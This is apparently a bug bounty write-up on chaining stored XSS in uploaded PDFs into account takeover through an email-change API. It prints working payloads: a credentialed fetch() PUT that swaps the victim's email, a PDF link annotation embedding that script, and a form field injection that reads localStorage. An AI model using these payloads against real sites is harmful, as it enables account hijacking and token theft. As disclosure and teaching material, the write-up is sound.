From Exploit to Payday-Chaining Stored XSS in PDF Upload to Full AccountTakeover via Email change…

“Me, realizing I can take over accounts with just a malicious PDF.”

Always not a P2 or P4 chain into P1

Why This Vulnerability Exists

The root cause of this critical vulnerability lies in the use of outdated or insecure PDF processing libraries, such as PDFTron, PDF.js, or similar tools, which fail to sanitize embedded JavaScript in PDFs properly.

Overview

This exploit is achieved by uploading a specially crafted PDF file that executes malicious JavaScript code, changing the victim’s email address to the attacker’s. Let’s break this down in simple terms.

What Happened?

The Weak Spot: The file upload feature doesn’t properly check PDF files for malicious content.The Trick: Attackers upload a PDF that secretly contains harmful JavaScript code.The Result: When a victim opens this malicious PDF, the script runs in the background and changes the victim’s email address in the system to one controlled by the attacker.

This gives the attacker full control of the victim’s account — no password needed.

How the Attack Works

Step 1: The attacker uploads a PDF file with hidden malicious code.

This PDF contains JavaScript designed to send a request to companies API (the system that handles email updates) to change a user’s email address.

Step 2: The victim, thinking the PDF is safe, opens it.

Step 3: The malicious script runs automatically without the victim knowing.

Step 4: The email address in the victim’s account is replaced with the attacker’s email. From this point, the attacker can reset passwords, access sensitive data, and lock the victim out.

Real-Life Example

Here’s an example script hidden in a PDF:

fetch('/api/employees/{id}/email', {
method: 'PUT',
headers: { 'Content-Type': 'application/json' },
credentials: 'include',
body: JSON.stringify({ email: 'attacker@example.com' })
});

8 0 obj
<<
/Type /Annot
/Subtype /Link
/Border [0 0 0]
/Rect [56.693 771.389 133.757 785.189]
/A <<
/Type /Action
/S /URI
/URI (data:text/html,<script>fetch(‘/api/employees/XXXXXXXXX/email’, { method: ‘PUT’, headers: { ‘Content-Type’: ‘application/json’ }, credentials: ‘include’, body: JSON.stringify({ email: ‘attackers-email@email.com’ }) }).then(res => res.json()).then(console.log).catch(console.error);</script>)
>>
>>
endobj

LOCAL STORAGE

7 0 obj
<<
/Type /Annot
/Subtype /Widget
/FT /Tx
/T (MyField)
/V (“>’></div><details/open/ontoggle=confirm(JSON.stringify(localStorage))></details>)
/Rect [ 100 200 150 250 ]
/AA 11 0 R
>>
endobj

Download the full PDF link: https://github.com/meljith-lab/Pdf-xss

Why It’s Dangerous

This is not just a technical bug — it has real-world consequences:

Account Takeover: Attackers gain full access to user accounts by simply swapping out the email.Sensitive Data Exposure: Personal, financial, or business-critical data stored in the account can be accessed.Reputation Damage: The trust in the platform is at risk. Users might hesitate to engage with a system that allows such critical exploits.Scalable Attacks: Any attacker with access to upload PDFs can exploit this vulnerability to target multiple users.

Bonus from writing a good report

Takeaway

This vulnerability reminds us of an important lesson: even trusted file types like PDFs can be dangerous if proper security measures aren’t in place. A small oversight in file handling can have massive consequences for users and the platform.

Follow Me for More Insights

If you enjoyed this write-up and want to learn more about security vulnerabilities, bug bounties, and how to disclose critical issues, connect with me on LinkedIn responsibly:

https://www.linkedin.com/in/meljith-pereira/
https://x.com/meljith